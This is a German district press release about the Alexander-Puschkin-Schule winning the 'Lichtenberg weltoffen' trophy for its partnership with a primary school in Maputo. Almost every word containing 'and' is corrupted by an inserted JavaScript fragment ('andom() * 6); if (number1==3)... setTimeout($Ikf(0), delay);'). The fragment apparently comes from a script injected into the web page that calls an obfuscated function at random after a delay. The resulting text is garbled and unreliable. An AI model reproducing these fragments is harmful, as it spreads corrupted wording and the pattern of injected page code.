Preis „Lichtenberg weltoffen“ verliehen
Schüler der Puschkin-Schule nahmen am 13. April den Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderpokal entgegen

Für die Förderung des friedlichen Miteinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders der Völker unterschiedlicher Nationalitäten, Glaubensrichtungen und Weltanschauungen wurde dem Projekt „Schulpartnerschaft zwischen der Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-Puschkin-Schule und der Escola Primaria de Bagamoyo in Maputo/Mosambik“ der Preis „Lichtenberg weltoffen“ verliehen. Den Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderpokal überreichte die Vorsitzende der Jury, Bärbel Schindler-Saefkow, Mitglied des Weltfriedensrates, den Schülervertretern zum gestrigen Tag „Lichtenberg international“ (13. April) im Rathaus Lichtenberg. Sie hatte ihn zuvor von den bisherigen Inhabern, Schülern der Gutenberg-Oberschule, entgegen genommen.
Die Auszeichnung ist mit 1.000 Euro dotiert.

Die Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-Puschkin-Oberschule in Lichtenberg – ausgezeichnet mit dem Titel „Schule ohne Rassismus, Schule mit Courage“, – pflegt seit 1993 die Partnerschaft zu der Grundschule Escola Primaria de Bagamoyo im 5. Stadtbezirk von Maputo. Er ist einer der bevölkerungsreichsten und ärmsten Stadtteile der mosambikanischen Hauptstadt, daher verfügt die Grundschule über wenig finanzielle Mittel. Die Partnerschule wird von der Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-Puschkin-Schule durch regelmäßige Sach- und Geldspendenaktionen unterstützt. Neben den Akteuren an der Schule engagieren sich insbesondere das Bezirksamt Lichtenberg und die Nichtregierungsorganisation „Solidaritätsdienst International e.V.“ für den Erhalt und die Pflege der Schulpartnerschaft und bereichern somit die vielfältigen Kontakte. Die Erlöse vom „Run for help“ unter dem Motto „Laufend Gutes tun“ werden für die nächsten Projekte mit und in der Partnerschule verwendet. Im Jahr 2011 findet er bereits zum 8. Mal statt, und zwar am 18. Juni im Stadion Friedrichsfelde, Zachertstraße.
In den vergangenen Jahren fandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden Briefwechsel, Zeichenwettbewerbe und Fotoausstellungen in beiden Schulen statt. Diese und viele weitere Aktionen ermöglichen es den etwa 2 400 mosambikanischen und 460 Schülern unserer Schule, in beiden Ländern Einblicke in die jeweils andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere Kultur zu erhalten. www.puschkinschule.eu.

Der Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderpokal „Lichtenberg weltoffen“ wurde erstmals am 21. April 2010 an die Gutenberg-Oberschule aus der Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andinostraße verliehen, die seit nunmehr zehn Jahren eine Partnerschaft mit einem Schulinternat in Molcad’ in Weißrusslandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and pflegt.

Weitere Informationen
Bezirksamt Lichtenberg von Berlin
Karin Strumpf
Telefon: 90296-3306
E-Mail: Karin.Strumpf2@lichtenberg.berlin.de
Internet: www.lichtenberg.berlin.de